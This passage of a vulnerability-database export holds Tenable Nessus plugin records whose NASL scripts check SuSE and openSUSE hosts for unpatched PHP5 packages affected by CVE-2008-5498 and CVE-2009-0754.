value:\"p-cpe:/a:novell:suse_linux:11:php5-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:php5-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/03/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (pl) audit(AUDIT_OS_NOT, \"SuSE 11.0\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"apache2-mod_php5-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-bcmath-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-bz2-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-calendar-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-ctype-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-curl-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-dba-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-dbase-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-dom-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-exif-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-fastcgi-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-ftp-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-gd-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-gettext-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-gmp-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-hash-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-iconv-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-json-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-ldap-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-mbstring-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-mcrypt-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-mysql-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-odbc-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-openssl-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-pcntl-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-pdo-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-pear-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-pgsql-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-pspell-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-shmop-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-snmp-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-soap-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-suhosin-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-sysvmsg-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-sysvsem-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-sysvshm-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-tokenizer-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-wddx-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-xmlreader-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-xmlrpc-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-xmlwriter-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-xsl-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-zip-5.2.6-50.18.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"php5-zlib-5.2.6-50.18.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-17T14:43:15", "description": "Missing bounds checks of an error in the imageRotate function of the\ngd extension potentially allowed attackers to read portions of memory.\n(CVE-2008-5498)\n\nThe mbstring.func_overload in .htaccess was applied to other virtual\nhosts on th same machine. (CVE-2009-0754)", "edition": 24, "published": "2009-09-24T00:00:00", "title": "SuSE 10 Security Update : PHP5 (ZYPP Patch Number 6069)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0754", "CVE-2008-5498"], "modified": "2009-09-24T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_APACHE2-MOD_PHP5-6069.NASL", "href": "https://www.tenable.com/plugins/nessus/41476", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(41476);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-5498\", \"CVE-2009-0754\");\n\n script_name(english:\"SuSE 10 Security Update : PHP5 (ZYPP Patch Number 6069)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Missing bounds checks of an error in the imageRotate function of the\ngd extension potentially allowed attackers to read portions of memory.\n(CVE-2008-5498)\n\nThe mbstring.func_overload in .htaccess was applied to other virtual\nhosts on th same machine. (CVE-2009-0754)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5498.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-0754.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6069.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_cwe_id(134, 200);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/03/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"apache2-mod_php5-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-bcmath-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-bz2-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-calendar-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-ctype-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-curl-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-dba-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-dbase-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-devel-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-dom-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-exif-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-fastcgi-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-ftp-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-gd-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-gettext-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-gmp-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-iconv-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-imap-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-json-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-ldap-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-mbstring-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-mcrypt-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-mhash-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-mysql-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-ncurses-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-odbc-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-openssl-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-pcntl-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-pdo-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-pear-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-pgsql-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-posix-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-pspell-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-shmop-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-snmp-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-soap-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-sockets-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-sqlite-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-suhosin-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-sysvmsg-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-sysvsem-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-sysvshm-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-tokenizer-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-wddx-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-xmlreader-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-xmlrpc-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-xsl-5.2.5-9.14\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"php5-zlib-5.2.5-9.14\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-17T14:43:15", "description": "php 5.1.9 fixes among other things some security issues :\n\n - Missing bounds checks of an error in the imageRotate\n function of the gd extension potentially allowed\n attackers to read portions of memory (CVE-2008-5498).\n\n - the mbstring.func_overload in .htaccess was applied to\n other virtual hosts on th same machine (CVE-2009-0754).", "edition": 24, "published": "2009-04-03T00:00:00", "title": "openSUSE 10 Security Update : apache2-mod_php5 (apache2-mod_php5-6068)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0754", "CVE-2008-5498"], "modified": "2009-04-03T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:php5-openssl", "p-cpe:/a:novell:opensuse:php5-dba", "cpe:/o:novell:opensuse:10.3", "p-cpe:/a:novell:opensuse:php5-mcrypt", "p-cpe:/a:novell:opensuse:php5-sysvmsg", "p-cpe:/a:novell:opensuse:php5-bz2", "p-cpe:/a:novell:opensuse:php5-xmlrpc", "p-cpe:/a:novell:opensuse:php5-json", "p-cpe:/a:novell:opensuse:php5-sqlite", "p-cpe:/a:novell:opensuse:php5-suhosin", "p-cpe:/a:novell:opensuse:php5-curl", "p-cpe:/a:novell:opensuse:php5-mysql", "p-cpe:/a:novell:opensuse:php5-calendar", "p-cpe:/a:novell:opensuse:php5-mhash", "p-cpe:/a:novell:opensuse:php5-pear", "p-cpe:/a:novell:opensuse:php5-dbase", "p-cpe:/a:novell:opensuse:php5-ftp", "p-cpe:/a:novell:opensuse:php5-tidy", "p-cpe:/a:novell:opensuse:php5-tokenizer", "p-cpe:/a:novell:opensuse:php5-imap", "p-cpe:/a:novell:opensuse:php5-sockets", "p-cpe:/a:novell:opensuse:php5-gd", "p-cpe:/a:novell:opensuse:php5-posix", "p-cpe:/a:novell:opensuse:php5-sysvsem", "p-cpe:/a:novell:opensuse:php5-fastcgi", "p-cpe:/a:novell:opensuse:php5-wddx", "p-cpe:/a:novell:opensuse:php5-odbc", "p-cpe:/a:novell:opensuse:php5-xmlreader", "p-cpe:/a:novell:opensuse:php5-gmp", "p-cpe:/a:novell:opensuse:php5-ncurses", "p-cpe:/a:novell:opensuse:php5-zlib", "p-cpe:/a:novell:opensuse:php5-hash", "p-cpe:/a:novell:opensuse:php5-dom", "p-cpe:/a:novell:opensuse:php5-soap", "p-cpe:/a:novell:opensuse:php5-snmp", "p-cpe:/a:novell:opensuse:php5-pdo", "p-cpe:/a:novell:opensuse:php5-pspell", "p-cpe:/a:novell:opensuse:php5-ctype", "p-cpe:/a:novell:opensuse:apache2-mod_php5", "p-cpe:/a:novell:opensuse:php5-pcntl", "p-cpe:/a:novell:opensuse:php5-zip", "p-cpe:/a:novell:opensuse:php5-sysvshm", "p-cpe:/a:novell:opensuse:php5", "p-cpe:/a:novell:opensuse:php5-shmop", "p-cpe:/a:novell:opensuse:php5-devel", "p-cpe:/a:novell:opensuse:php5-iconv", "p-cpe:/a:novell:opensuse:php5-gettext", "p-cpe:/a:novell:opensuse:php5-xmlwriter", "p-cpe:/a:novell:opensuse:php5-bcmath", "p-cpe:/a:novell:opensuse:php5-pgsql", "p-cpe:/a:novell:opensuse:php5-xsl", "p-cpe:/a:novell:opensuse:php5-readline", "p-cpe:/a:novell:opensuse:php5-mbstring", "p-cpe:/a:novell:opensuse:php5-exif", "p-cpe:/a:novell:opensuse:php5-ldap"], "id": "SUSE_APACHE2-MOD_PHP5-6068.NASL", "href": "https://www.tenable.com/plugins/nessus/36079", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update apache2-mod_php5-6068.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(36079);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-5498\", \"CVE-2009-0754\");\n\n script_name(english:\"openSUSE 10 Security Update : apache2-mod_php5 (apache2-mod_php5-6068)\");\n script_summary(english:\"Check for the apache2-mod_php5-6068 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"php 5.1.9 fixes among other things some security issues :\n\n - Missing bounds checks of an error in the imageRotate\n function of the gd extension potentially allowed\n attackers to read portions of memory (CVE-2008-5498).\n\n - the mbstring.func_overload in .htaccess was applied to\n other virtual hosts on th same machine (CVE-2009-0754).\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache2-mod_php5 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_cwe_id(134, 200);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-mod_php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dbase\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-hash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mhash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-posix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-readline\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sockets\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-suhosin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/03/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.3\", reference:\"apache2-mod_php5-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-bcmath-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-bz2-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-calendar-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-ctype-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-curl-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-dba-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-dbase-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-devel-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-dom-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-exif-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-fastcgi-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-ftp-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-gd-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-gettext-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-gmp-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"php5-hash-5.2.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", 